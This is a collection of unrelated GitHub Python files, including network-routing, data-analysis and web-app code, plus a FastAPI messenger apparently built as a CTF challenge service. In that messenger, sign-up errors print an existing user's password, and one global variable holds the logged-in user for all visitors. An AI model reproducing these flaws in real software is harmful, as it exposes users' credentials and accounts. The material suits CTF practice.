relative_imp.round(2)\r\n\r\n\r\n\r\n# # Plot heatmap\r\n# plt.title('Relative importance of attributes')\r\n# sns.heatmap(data=relative_imp, annot=True, cmap='RdYlGn')\r\n# plt.show()\r\n\r\n\r\n\r\n# survival analysis for finding retention rate\r\n\r\n\r\n# cohort analysis\r\n\r\ndef month(value):\r\n    return dt.datetime(value.year,value.month,1)\r\n\r\n# copying the data into another dataframe\r\ndf1 = df.copy()\r\n#applying function month to get first date on the month\r\ndf1['Invoice_Month'] = df1['InvoiceDate'].apply(month)\r\n# grouping all the customers by month\r\nt1 = df1.groupby('Customer ID')['Invoice_Month']\r\nt1.head()\r\n# getting month cohort months \r\ndf1['Cohort_Month'] = t1.transform('min')\r\ndf1[['Customer ID','InvoiceDate','Invoice_Month', 'Cohort_Month']].head()\r\n\r\n# defining a function to separate invoice year and month\r\ndef parse_date(d):\r\n    year = d.dt.year\r\n    month = d.dt.month\r\n    return year, month\r\n\r\n\r\nyear_i, month_i = parse_date(df1['InvoiceDate'])\r\n\r\nyear_c, month_c = parse_date(df1['Cohort_Month'])\r\n\r\n\r\n# Calculate differences\r\ndiff1 = year_i - year_c\r\ndiff2 = month_i - month_c\r\n\r\n# Calculating cohort index\r\ndf1['Cohort_Index'] = diff1 * 12 + diff2+ 1\r\n\r\n#df1[['Customer ID','InvoiceDate','Invoice_Month', 'Cohort_Month', 'Cohort_Index']].head()\r\ng = df1.groupby(['Cohort_Month', 'Cohort_Index'])\r\nsurv_data = g['Customer ID'].apply(pd.Series.nunique).reset_index()\r\n\r\nsurv_data.columns = ['Cohort_Month', 'Cohort_Index', 'Number of distinct Customers']\r\n\r\nretention_counts = surv_data.pivot(index='Cohort_Month', columns='Cohort_Index', \r\n                          values='Number of distinct Customers')\r\n\r\n\r\ncohort_sizes = retention_counts.iloc[:,0]\r\n\r\n# calculating 
retention rate\r\nrate = retention_counts.divide(cohort_sizes, axis=0)\r\n\r\nrate.round(3)*100\r\n\r\nrate.index = rate.index.strftime('%Y-%m')\r\n\r\n\r\nplt.figure(figsize=(25, 25))\r\n\r\n\r\nplt.title('Retention Rate', fontsize = 16)\r\nsns.heatmap(rate, annot=True,cmap='YlGnBu', vmin = 0.0 , vmax = 0.6)\r\nplt.ylabel('Cohort Month')\r\nplt.xlabel('Cohort Index')\r\nplt.yticks( rotation='360')\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"snehalbende/Customer_Segmentation","sub_path":"customer_segmentation.py","file_name":"customer_segmentation.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17991721959","text":"from datetime import datetime\n\nimport pytest\nfrom attr import asdict\nfrom chat.application.services import Chats, Users\n\n\n@pytest.fixture(scope='function')\ndef service_user(user_repo):\n    return Users(user_repo=user_repo)\n\n\n@pytest.fixture(scope='function')\ndef service_chat(user_repo, chat_repo, chat_members_repo, chat_messages_repo):\n    return Chats(user_repo=user_repo, chat_repo=chat_repo, chat_members_repo=chat_members_repo,\n                 chat_messages_repo=chat_messages_repo)\n\n\ndata_user = {\n\n    'login': 'user_login_1',\n    'password': 'user_password_1',\n    'user_name': 'user_name_1',\n    'id': 1,\n}\n\ndata_chat = {\n    'author_id': 1,\n    'chat_name': 'chat_1',\n    'description': 'desc_1',\n    'creation_date': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),\n    'id': 1\n}\n\ndata_chat_update = {\n    'author_id': 1,\n    'chat_name': 'chat_new',\n    'description': 'desc_new',\n    'creation_date': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),\n    'id': 1\n}\n\ndata_chat_user = {\n    'chat_id': 1,\n    'user_id': 1,\n    'author_id': 1,\n    'id': 1,\n}\n\ndata_chat_msg = {\n    'chat_id': 1,\n    'user_id': 1,\n    'text': 'my msg',\n    'id': 1,\n    'send_time': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')\n}\n\n\ndef test_add_user(service_user):\n    service_user.add_user(**data_user)\n    service_user.user_repo.add_instance.assert_called_once()\n\n\ndef test_get_user(service_user, user_repo):\n    user = service_user.get_info(id=1)\n    assert asdict(user) == data_user\n\n\ndef test_add_chat(service_chat):\n    service_chat.add_chat(**data_chat)\n    service_chat.chat_repo.add_instance.assert_called_once()\n\n\ndef test_update_chat(service_chat):\n    new_chat = service_chat.update_chat(**data_chat_update)\n    assert asdict(new_chat) == data_chat_update\n\n\ndef test_get_chat(service_chat):\n    chat = service_chat.get_info(chat_id=1, user_id=1)\n    assert asdict(chat) == data_chat\n\n\ndef test_add_chat_user(service_chat):\n    service_chat.add_user(**data_chat_user)\n    service_chat.chat_members_repo.add_instance.assert_called_once()\n\n\ndef test_add_chat_msg(service_chat):\n    service_chat.send_massage(**data_chat_msg)\n    service_chat.chat_messages_repo.send_message.assert_called_once()\n\n\ndef test_delete_chat(service_chat):\n    service_chat.delete_chat(chat_id=1, user_id=1)\n    service_chat.chat_repo.delete_instance.assert_called_once()\n\n\ndef test_leave(service_chat):\n    service_chat.leave_chat(chat_id=1, user_id=1)\n    service_chat.chat_repo.delete_instance.assert_called_once()\n\n\ndef test_get_chat_user(service_chat):\n    members = service_chat.get_users(chat_id=1, user_id=1)\n    assert asdict(members[0]) == data_chat_user\n\n\ndef test_get_chat_msg(service_chat):\n    messages = service_chat.get_message(chat_id=1, user_id=1)\n    assert asdict(messages) == 
data_chat_msg\n","repo_name":"AlexandrovDaniil/evraz_project1","sub_path":"components/chat_backend/tests/unit/application/services/test_chat.py","file_name":"test_chat.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42319780787","text":"from threading import Thread, Event\nfrom scapy.all import sendp\nfrom scapy.all import Packet, Ether, IP, ARP, ICMP\nfrom async_sniff import sniff\nfrom packet_datatypes import CPUMetadata, Hello, LSU, LSUAd, PWOSPF\nimport time\nimport collections\n\nARP_OP_REQ = 0x0001\nARP_OP_REPLY = 0x0002\nALLRoutersAreaID = '224.0.0.5'\nLSU_INT = 5\nPWOSPF_PROT_NUM = 89\nPWOSPF_HELLO_TYPE = 1\nPWOSPF_LSU_TYPE = 4\nstart_wait=0.3\n\nclass MacLearningController(Thread):\n def __init__(self, sw, macAddr, routerID, hello_int, lsu_int):\n super(MacLearningController, self).__init__()\n self.sw = sw\n self.start_wait = start_wait # time to wait for the controller to be listenning\n self.iface = sw.intfs[1].name\n self.port_for_mac = {}\n self.stop_event = Event()\n self.mac_for_ip = {}\n self.mac_for_ip_times = {}\n self.macAddr = macAddr\n\n self.adj_list = []\n self.adj_list_timeout = []\n self.last_packets = []\n\n self.routerID = routerID\n self.areaID = ALLRoutersAreaID\n self.helloint = hello_int\n self.lsuint = lsu_int\n self.seq_num_lsu = 0\n\n self.sending_hello_thread = Periodic_Hello_Sender(routing_controller=self)\n self.sending_lsu_thread = Periodic_LSU_Sender(routing_controller=self)\n\n def addMacAddr(self, mac, port):\n # Don't re-add the mac-port mapping if we already have it:\n if mac in self.port_for_mac: return\n\n self.sw.insertTableEntry(table_name='MyIngress.fwd_l2',\n match_fields={'hdr.ethernet.dstAddr': [mac]},\n action_name='MyIngress.set_egr',\n action_params={'port': port})\n self.port_for_mac[mac] = port\n \n def addIPAddr(self, ip, mac):\n # Don't re-add the ip-mac mapping if we already have it:\n if ip in self.mac_for_ip: return\n\n self.sw.insertTableEntry(table_name='MyIngress.arp_table',\n match_fields={'next_ip_addr': [ip]},\n action_name='MyIngress.match_arp_addr',\n action_params={'next_mac': mac})\n self.mac_for_ip[ip] = mac\n # self.mac_for_ip_times[ip] = time.time()\n\n def handleArpReply(self, pkt):\n self.addMacAddr(pkt[ARP].hwsrc, pkt[CPUMetadata].srcPort)\n # print(\"ARP reply from %s\" % pkt[ARP].psrc)\n # print(\"hwsrc: %s\" % pkt[ARP].hwsrc)\n\n self.addIPAddr(pkt[ARP].psrc, pkt[ARP].hwsrc)\n self.send(pkt)\n \n def generate_arp_reply(self, pkt):\n if pkt[ARP].pdst == (self.routerID + '0'):\n ip_dest = pkt[ARP].pdst\n pkt[Ether].dst = pkt[Ether].src\n pkt[Ether].src = self.macAddr\n pkt[ARP].op = ARP_OP_REPLY\n pkt[ARP].pdst = pkt[ARP].psrc\n pkt[ARP].psrc = ip_dest\n pkt[ARP].hwdst = pkt[ARP].hwsrc\n pkt[ARP].hwsrc = self.macAddr\n return pkt\n \n\n def handleArpRequest(self, pkt):\n self.addMacAddr(pkt[ARP].hwsrc, pkt[CPUMetadata].srcPort)\n # print(\"ARP request from %s\" % pkt[ARP].psrc)\n # print(\"hwsrc: %s\" % pkt[ARP].hwsrc)\n \n self.addIPAddr(pkt[ARP].psrc, pkt[ARP].hwsrc)\n\n pkt = self.generate_arp_reply(pkt)\n\n self.send(pkt)\n\n def floodLSUPkt(self, pkt):\n newTTL = pkt[LSU].ttl - 1\n if newTTL > 0:\n for n in self.adj_list[self.routerID][0]:\n newPkt = pkt\n key_mac = self.mac_for_ip[n]\n key_port = self.port_for_mac[key_mac]\n newPkt[CPUMetadata].dstPort = key_port\n newPkt[IP].dst = n\n newPkt[LSU].ttl = newTTL\n if newPkt[IP].dst != newPkt[IP].src:\n self.send(newPkt)\n\n def 
generate_router_datatype(self, routerID):\n        return (routerID, ALLRoutersAreaID, LSU_INT)\n\n    def compute_shortest_path(self):\n        visited = set()\n        visited.add(self.routerID)\n        path = {}\n        queue = collections.deque([])\n        for routerId in self.adj_list[self.routerID][0]:\n            path[routerId] = routerId\n            visited.add(routerId)\n            queue.append(routerId)\n        \n        while(queue):\n            curr_routerID = queue.popleft()\n            curr_best_path = path[curr_routerID]\n            for neighbor_routerID in self.adj_list[curr_routerID][0]:\n                if(neighbor_routerID not in visited):\n                    visited.add(neighbor_routerID)\n                    path[neighbor_routerID] = curr_best_path\n                    queue.append(neighbor_routerID)\n        return path\n    \n    def update_table(self, path):\n        for key in path.keys():\n            print(\"key: %s\\n\" % key)\n            key_mac = self.mac_for_ip[path[key]]\n            key_port = self.port_for_mac[key_mac]\n\n            self.sw.insertTableEntry(table_name = 'MyIngress.routing_table',\n                    match_fields = {'hdr.ipv4.dstAddr': path[key]},\n                    action_name = 'MyIngress.forwarding_path',\n                    action_params = {'next': path[key], 'port': key_port})\n\n    def handlePkt(self, pkt):\n        #pkt.show2()\n        assert CPUMetadata in pkt, \"Should only receive packets from switch with special header\"\n\n        # Ignore packets that the CPU sends:\n        if pkt[CPUMetadata].fromCpu == 1: return\n\n        if ARP in pkt:\n            if pkt[ARP].op == ARP_OP_REQ:\n                self.handleArpRequest(pkt)\n            elif pkt[ARP].op == ARP_OP_REPLY:\n                self.handleArpReply(pkt)\n        \n        if ICMP in pkt:\n            # to do handle ICMP packet\n            return\n        \n        if IP in pkt:\n            # to do handle IP packet\n            # if pkt dest not in intfs and dest is not for hello then icmp unreachable\n            return \n\n        if PWOSPF in pkt:\n            if pkt[PWOSPF].version != 2:\n                return\n            \n            routerID = pkt[IP].src\n            if pkt[PWOSPF].type == 1 and Hello in pkt:\n                # if router has neighbor already, update timeout\n                if routerID not in self.adj_list:\n                    # else add neighbor to list\n                    new_router = self.generate_router_datatype(routerID)\n                    curr_router = self.generate_router_datatype(self.routerID)\n                    self.adj_list[routerID].append(curr_router)\n                    self.adj_list[self.routerID].append(new_router)\n\n                self.adj_list_timeout[routerID] = time.time()\n            \n            if pkt[PWOSPF].type == 4 and LSU in pkt:\n                # If the LSU was originally generated by the incoming router, the packet is dropped\n                if self.routerID == routerID:\n                    return\n\n                if routerID in self.last_packets:\n                    last_pkt_received = self.last_packets[routerID]\n                    if last_pkt_received[LSU].seq == pkt[LSU].seq:\n                        return\n                \n                self.last_packets[routerID] = pkt\n\n                # update database\n                for ad in pkt[LSU].ads:\n                    ad_routerID = ad.routerID\n                    if ad_routerID not in self.adj_list:\n                        self.adj_list[ad_routerID] = []\n                    \n                    ad_router_datatype = self.generate_router_datatype(ad_routerID)\n                    curr_router_datatype = self.generate_router_datatype(self.routerID)\n\n                    if ad_router_datatype not in self.adj_list[routerID]:\n                        self.adj_list[routerID].append(self.generate_router_datatype(ad_routerID))\n                    if curr_router_datatype not in self.adj_list[ad_routerID]:\n                        self.adj_list[ad_routerID].append(self.generate_router_datatype(routerID))\n                \n                # recompute shortest paths\n                shortest_paths = self.compute_shortest_path()\n                self.update_table(shortest_paths)\n                \n                # flood packets\n                self.floodLSUPkt(pkt)\n\n    def send(self, *args, **override_kwargs):\n        pkt = args[0]\n        assert CPUMetadata in pkt, \"Controller must send packets with special header\"\n        pkt[CPUMetadata].fromCpu = 1\n        kwargs = dict(iface=self.iface, verbose=False)\n        kwargs.update(override_kwargs)\n        sendp(*args, **kwargs)\n\n    def run(self):\n        sniff(iface=self.iface, 
prn=self.handlePkt, stop_event=self.stop_event)\n\n def start(self, *args, **kwargs):\n super(MacLearningController, self).start(*args, **kwargs)\n\n # add monolith ARP, LSU, Hello Packet Managers\n # call .start()\n # self.sending_hello_thread.start()\n # self.sending_lsu_thread.start()\n\n time.sleep(self.start_wait)\n\n def join(self, *args, **kwargs):\n self.stop_event.set()\n super(MacLearningController, self).join(*args, **kwargs)\n\nclass Periodic_Hello_Sender(Thread):\n def __init__(self, routing_controller):\n super(Periodic_Hello_Sender, self).__init__()\n self.sender_ctrl = routing_controller\n\n def run(self):\n for i in range(5): # for each port \n if i != 4:\n port = i\n pkt = Ether()/CPUMetadata()/IP()/PWOSPF()/Hello()\n pkt[Ether].src = self.sender_ctrl.macAddr\n pkt[Ether].dst = \"ff:ff:ff:ff:ff:ff\"\n pkt[CPUMetadata].fromCpu = 1\n pkt[CPUMetadata].origEtherType = 0x0800\n pkt[CPUMetadata].srcPort = 1\n pkt[CPUMetadata].dstPort = port\n pkt[IP].src = self.sender_ctrl.routerID\n pkt[IP].dst = \"224.0.0.5\"\n pkt[IP].proto = PWOSPF_PROT_NUM\n pkt[PWOSPF].version = 2\n pkt[PWOSPF].type = PWOSPF_HELLO_TYPE\n pkt[PWOSPF].length = 0\n pkt[PWOSPF].routerID = self.sender_ctrl.routerID\n pkt[PWOSPF].areaID = self.sender_ctrl.areaID\n pkt[PWOSPF].checksum = 0\n pkt[Hello].netmask = 0\n pkt[Hello].helloint = self.sender_ctrl.helloint\n\n self.sender_ctrl.send(pkt)\n\n time.sleep(self.sender_ctrl.helloint)\n\nclass Periodic_LSU_Sender(Thread):\n def __init__(self, routing_controller):\n super(Periodic_LSU_Sender, self).__init__()\n self.sending_ctrl = routing_controller\n\n def run(self):\n adList = []\n for n in self.sending_ctrl.adj_list:\n pkt = LSUAd()\n pkt[LSUAd].subnet = 0\n pkt[LSUAd].mask = 0\n pkt[LSUAd].routerID = n[0]\n adList.append(pkt)\n\n # Send LSU packet\n pkt = Ether()/CPUMetadata()/IP()/PWOSPF()/LSU()\n pkt[Ether].src = self.sending_ctrl.macAddr\n pkt[Ether].dst = \"ff:ff:ff:ff:ff:ff\"\n pkt[CPUMetadata].fromCpu = 1\n pkt[CPUMetadata].origEtherType = 0x0800\n pkt[CPUMetadata].srcPort = 1\n pkt[IP].src = self.sending_ctrl.routerID\n pkt[IP].proto = PWOSPF_PROT_NUM\n pkt[PWOSPF].version = 2\n pkt[PWOSPF].type = PWOSPF_LSU_TYPE\n pkt[PWOSPF].length = 0\n pkt[PWOSPF].routerID = self.sending_ctrl.routerID\n pkt[PWOSPF].areaID = self.sending_ctrl.areaID\n pkt[PWOSPF].checksum = 0\n pkt[LSU].sequence = self.sending_ctrl.seq_num_lsu\n pkt[LSU].ttl = 64\n pkt[LSU].numAds = len(adList)\n pkt[LSU].adList = adList\n\n self.sending_ctrl.seq_num_lsu = self.sending_ctrl.seq_num_lsu + 1\n self.sending_ctrl.floodLSUPkt(pkt)\n\n time.sleep(self.sending_ctrl.lsuint)\n","repo_name":"dylanfernandezdelara/p4_router_cpsc435","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39727438477","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: wxnacy(wxnacy@gmail.com)\n\"\"\"\nfor github\n\"\"\"\nimport requests\n\nfrom wapi import Wapi\n\nfrom goss.git import Git\nfrom goss.common import constants\n\nproxies = {\n \"http\": \"http://127.0.0.1:7890\",\n \"https\": \"http://127.0.0.1:7890\",\n}\n\nclass Github(Git):\n domain = 'api.github.com'\n\n def __init__(self, owner, repo=None, *args, **kwargs):\n self._owner = owner\n self._repo = repo\n self.www_wapi = Wapi(module_name = 'www_github',\n config_root=constants.WAPI_CONFIG_ROOT)\n self.api_wapi = Wapi(module_name = 'api_github',\n 
config_root=constants.WAPI_CONFIG_ROOT)\n self.api_wapi.config.get_env().add( owner=self._owner )\n\n def repo_profile(self, repo=None):\n if repo:\n self._repo = repo\n self.api_wapi.config.get_env().add( repo=self._repo )\n return self.api_wapi.request('repo_profile')\n\n def repo_content(self, repo, path):\n if repo:\n self._repo = repo\n self.api_wapi.config.get_env().add(\n repo=self._repo,\n path = path)\n return self.api_wapi.request('repo_content')\n\nif __name__ == \"__main__\":\n g = Github('wxnacy')\n # res = g.repo_profile('goss')\n res = g.repo_content('book', '2014.md')\n import json\n print(json.dumps(res.json(), indent=4))\n\n","repo_name":"wxnacy/goss","sub_path":"goss/git/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11193844481","text":"from sys import stdin as s\n\n\ns = open('input.txt', 'rt')\n\na,b,c = map(int,s.readlines())\n\n# result = int(a*b*c)\n# temp = [0,0,0,0,0,0,0,0,0,0]\n# while result > 10 :\n# temp[int(result%10)] += 1\n# result /= 10\n# result = int(result)\n\n# temp[result] +=1\n\n\n# for i in temp:\n# print(i)\n\n\nresult = a*b*c\n\nfor i in range(10):\n print(str(result).count(str(i)))\n\n\n\n\n\n\n","repo_name":"wnstn819/AlgoTrip","sub_path":"pythonSt/Week01/기본(기초, 수학, 재귀, 정렬, 완전탐색)/B2_2577_숫자의 개수.py","file_name":"B2_2577_숫자의 개수.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42231382002","text":"import re\r\ncount = 0\r\nregex = r'^([1-8][0-9]|90)\\..*(GET|POST).*(200).*'\r\nwith open('access.log.txt', \"r\") as file:\r\n data = file.readlines()\r\n for a in data:\r\n if(re.match(regex, a)):\r\n x = re.search(regex, a)\r\n print(x.group())\r\n count = count+1\r\n print(count)","repo_name":"NazarHladysh/Lab12","sub_path":"Lab12.py","file_name":"Lab12.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5608635180","text":"from django import forms \nfrom django.contrib.auth.forms import UserCreationForm \nfrom django.contrib.auth.models import User \nfrom .models import Work\n\nclass SignupForm(UserCreationForm): \n email = forms.EmailField(max_length=200, help_text='Required') \n class Meta: \n model = User \n fields = ('username', 'email', 'password1', 'password2') \n\nclass WorkForm(forms.ModelForm):\n price = forms.IntegerField(min_value=1000,max_value=50000)\n def clean(self):\n price = self.cleaned_data['price']\n time = self.cleaned_data['time']\n if time < 3 and price > 30000:\n raise forms.ValidationError('حداکثر قیمت کار‌های با زمان ۳ روز ۳۰۰۰۰ تومان می باشد')\n class Meta:\n model = Work\n fields = ('work_title', 'price', 'time', 'info')\n widgets = {\n 'work_title' : forms.Textarea(attrs={'cols': 80, 'rows': 1}),\n 'info' : forms.Textarea(attrs={'cols': 80, 'rows': 10}),\n }\n","repo_name":"MHN1401/git","sub_path":"page/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2217134358","text":"import sys\nfrom cachesim import CacheSimulator, Cache, MainMemory\n\ndef get_set_id(cache, addr):\n return (addr >> cache.cl_bits) % cache.sets\n\nfilename = sys.argv[1]\nN = sys.argv[2]\nmem = MainMemory()\n\n# Cascade Lake\nl3 = Cache(\"L3\", 14336, 16, 64, \"LRU\", 
write_allocate=False)\nl2 = Cache(\"L2\", 1024, 16, 64, \"LRU\", store_to=l3, victims_to=l3)\nl1 = Cache(\"L1\", 64, 8, 64, \"LRU\", store_to=l2, load_from=l2)\nmem.load_to(l2)\nmem.store_from(l3)\ncs = CacheSimulator(l1, mem)\n\nsets_hist = {\n 'l1': {s: 0 for s in range(l1.sets)},\n 'l2': {s: 0 for s in range(l2.sets)},\n 'l3': {s: 0 for s in range(l3.sets)}\n}\n\nwith open(filename, 'r') as fp:\n for line in fp.readlines():\n op, addr = line.split(\": \")\n op = op[0]\n addr = int(addr, 16)\n sets_hist['l1'][get_set_id(l1, addr)] += 1\n sets_hist['l2'][get_set_id(l2, addr)] += 1\n sets_hist['l3'][get_set_id(l3, addr)] += 1\n\nfor cache_level, data in sets_hist.items():\n if cache_level != 'l3':\n print(cache_level, \": \")\n for set_id in data:\n if data[set_id] > 0:\n print(set_id, \" -> \", data[set_id])\n","repo_name":"RRZE-HPC/MD-Bench","sub_path":"util/cache_sets_histogram.py","file_name":"cache_sets_histogram.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11110879541","text":"import os, pandas\nimport numpy as np\nimport pandas as pd\n# import plotly\n\nsymbols = ['3DA_AX']\n\nfor filename in os.listdir('datasets'):\n symbol = filename.split(\".\")[0]\n # print(symbol)\n df = pandas.read_csv('datasets/{}'.format(filename))\n # print(df)\n \n# error handling for empty dataframes\n if df.empty:\n continue\n \n#21SMA\n\ndf['EMA_21'] = df['Close'].ewm(span=21, adjust=False).mean()\ndf['EMA_50'] = df['Close'].ewm(span=50, adjust=False).mean()\n# Date,Open,High,Low,Close,Volume,Dividends,Stock Splits\n\n# ATR calculation\nhigh_low = df['High'] - df['Low']\nhigh_close = np.abs(df['High'] - df['Close'].shift())\nlow_close = np.abs(df['Low'] - df['Close'].shift())\nranges = pd.concat([high_low, high_close, low_close], axis=1)\ntrue_range = np.max(ranges, axis=1)\ndf['ATR'] = true_range.rolling(50).sum()/50\n\nprint(df)","repo_name":"Jimmybubbles/finance_algos","sub_path":"squeeze.py","file_name":"squeeze.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17201243940","text":"from fastapi import FastAPI, Request, Form, APIRouter\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import RedirectResponse\nfrom starlette.templating import Jinja2Templates\nfrom fastapi.encoders import jsonable_encoder\nfrom config import SQLALCHEMY_DATABASE_URL\nimport crud\nimport schemas\nimport databases\n\nactive_login = None\n\nclass UnicornException(Exception):\n def __init__(self, content: str, code_status: int):\n self.content = content\n self.status = code_status\n\napp = FastAPI()\n\napp.mount('/shape/static/css', StaticFiles(directory=\"/usr/src/app/shape/static/css\"), name=\"styles\")\napp.mount('/shape/static/js', StaticFiles(directory=\"/usr/src/app/shape/static/js\"), name=\"js\")\napp.mount('/shape/static/imgs', StaticFiles(directory=\"/usr/src/app/shape/static/imgs\"), name=\"im\")\ntemp = Jinja2Templates(directory=\"/usr/src/app/shape/\")\n\nuser_router = APIRouter(\n prefix=\"/api/user\",\n tags=[\"user\"],\n responses={404: {\"description\": \" Not found :(\"}},\n)\n\n@app.exception_handler(UnicornException)\nasync def unicorn_exception_handler(request: Request, exc: UnicornException):\n \"\"\" Handler for UnicornException-type errors \"\"\"\n return temp.TemplateResponse(\"info.html\", {\"request\": request,\n \"status\": exc.status,\n \"message\": 
f\"Oops! {exc.content}\",\n })\n\ndatabase = databases.Database(SQLALCHEMY_DATABASE_URL)\n\n@app.get(\"/\")\nasync def mainPage(request: Request):\n if active_login:\n return temp.TemplateResponse(\"index.html\", {\"request\": request, \"isAutorized\":active_login})\n else:\n return temp.TemplateResponse(\"index.html\", {\"request\": request})\n\n@user_router.get(\"/sign-up\")\nasync def signUpGet(request: Request):\n return temp.TemplateResponse(\"signup.html\", {\"request\": request})\n\n@user_router.post(\"/sign-up\")\nasync def signUp(request: Request, login: str = Form(...), passwrd: str = Form(...)):\n \n if_already_registered = await crud.already_registered(database, login)\n \n if if_already_registered:\n return await unicorn_exception_handler(request,\n UnicornException(\"This user already registered, him pass: \"+str(if_already_registered), 400))\n else:\n instance = schemas.UserCreate(login=login, password=passwrd)\n result = await crud.create_user(database, instance)\n return temp.TemplateResponse(\"tmp.html\", {\"request\": request, \"user_data\": result})\n\n@user_router.get(\"/sign-in\")\nasync def signInGet(request: Request):\n return temp.TemplateResponse(\"signin.html\", {\"request\": request})\n\n@user_router.post(\"/sign-in\")\nasync def signIn(request: Request, login: str = Form(...), password: str = Form(...)):\n global active_login\n cuser = schemas.UserCreate(login=login, password=password)\n if_active = await crud.check_current_user(database, cuser)\n\n if isinstance(if_active, dict):\n return await unicorn_exception_handler(request, UnicornException(\"No such user\", 404))\n\n if not if_active:\n active_login = login\n await crud.activate_user(database, cuser)\n \n active_login = login\n return await mainPage(request)\n\ndef deactivateLogin():\n global active_login\n active_login = None\n\n@user_router.get(\"/log-out\", response_model=schemas.UserBase, response_model_exclude_unset=True)\nasync def logOut(request: Request):\n if not active_login:\n return await unicorn_exception_handler(request, UnicornException(\"Exit error\", 400))\n\n response = await crud.deactivate_user(database, active_login)\n deactivateLogin()\n print(jsonable_encoder(response))\n return RedirectResponse(\"/\")\n\n@user_router.get(\"/sign-in/messages\")\nasync def getMessenges(request: Request):\n print(active_login)\n incoming_messages = await crud.all_incoming_messages(database, active_login)\n\n if isinstance(incoming_messages, str):\n return temp.TemplateResponse(\"messages.html\", {\"request\": request, \"isAutorized\":active_login, \n \"length\":0})\n elif not incoming_messages:\n return await unicorn_exception_handler(request, UnicornException(\"You are not authorized!\", 400))\n else:\n return temp.TemplateResponse(\"messages.html\", {\"request\": request, \"isAutorized\":active_login, \n \"messages\": incoming_messages, \"length\": len(incoming_messages)})\n\n\n@user_router.post(\"/sign-in/messages\", response_model=schemas.SendedBase, response_model_exclude_unset=True)\nasync def sendMessage(request: Request, recipientName: str = Form(...), message: str = Form(...)):\n returned = await crud.send_message(database, active_login, recipientName, message)\n if not returned:\n return await unicorn_exception_handler(request, UnicornException(\"No such recipient or sender\", 404))\n else:\n return returned\n\n@user_router.get(\"/sign-in/messages/all-users\")\nasync def getAllUsers(request: Request):\n print(active_login)\n all_users = await crud.all_users_db(database, active_login)\n\n if 
not all_users:\n return await unicorn_exception_handler(request, UnicornException(\"You are not authorized!\", 400))\n\n return temp.TemplateResponse(\"index.html\", {\"request\": request, \"isAutorized\":active_login, \n \"users\": all_users, \"length\": len(all_users)})\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\napp.include_router(user_router)\n","repo_name":"n57uctf/yetictf-2022-finals","sub_path":"M3SS3NG3R/m3ss3ng3r/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26597443633","text":"\"\"\"Models for Blogly.\"\"\"\nfrom flask_sqlalchemy import SQLAlchemy \nimport datetime\n\ndb = SQLAlchemy()\n\n\ndef connect_db(app):\n \"\"\"Connect to database.\"\"\"\n\n db.app = app\n db.init_app(app)\n\n\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer,\n primary_key = True,\n autoincrement = True)\n first_name = db.Column(db.String(25),\n nullable = False)\n last_name = db.Column(db.String(50),\n nullable = False)\n image_url = db.Column(db.String)\n posts = db.relationship('Posts', backref='user', cascade='all, delete-orphan')\n #the cascade='all, delete-orphan' option means that if this user is deleted, all of their posts are deleted too\n #middleman table\n\n\n def __repr__(self):\n return f\"\"\n\n\nclass Posts(db.Model):\n __tablename__ = \"posts\"\n id = db.Column(db.Integer,\n primary_key = True,\n autoincrement = True)\n title = db.Column(db.String(), \n nullable = False)\n content = db.Column(db.String(),\n nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # post_tag_post = db.relationship('PostTag', backref='posts_to_tag')\n tags = db.relationship('Tag', secondary='post_tag', back_populates='posts')\n\n# class Tag(db.Model):\n# __tablename__ = \"tags\"\n# id = db.Column(db.Integer,\n# primary_key = True,\n# autoincrement = True)\n# tags = db.Column(db.String(),\n# nullable = False )\n\n# post_tag = db.relationship('PostTag', backref='tags_for_posts')\nclass Tag(db.Model):\n __tablename__ = \"tags\"\n id = db.Column(db.Integer,\n primary_key=True,\n autoincrement=True)\n tags = db.Column(db.String(),\n nullable=False)\n\n # post_tag_tag = db.relationship('PostTag', secondary='post_tag', backref='tags')\n posts = db.relationship('Posts', secondary='post_tag', back_populates='tags')\n\nclass PostTag(db.Model):\n __tablename__ = 'post_tag'\n tags_id = db.Column(db.Integer, db.ForeignKey('tags.id'), primary_key = True)\n\n posts_id = db.Column(db.Integer, db.ForeignKey('posts.id'), primary_key=True)\n #We put 2 primary keys together to say those 2 things together are primary key for PostTag\n\n\n# def get_directory_join():\n# directory = db.session.query(Employee.name, Department.dept_name, Department.phone).join(Department).all()\n# for name, dept, phone in directory:\n# print(name, dept, 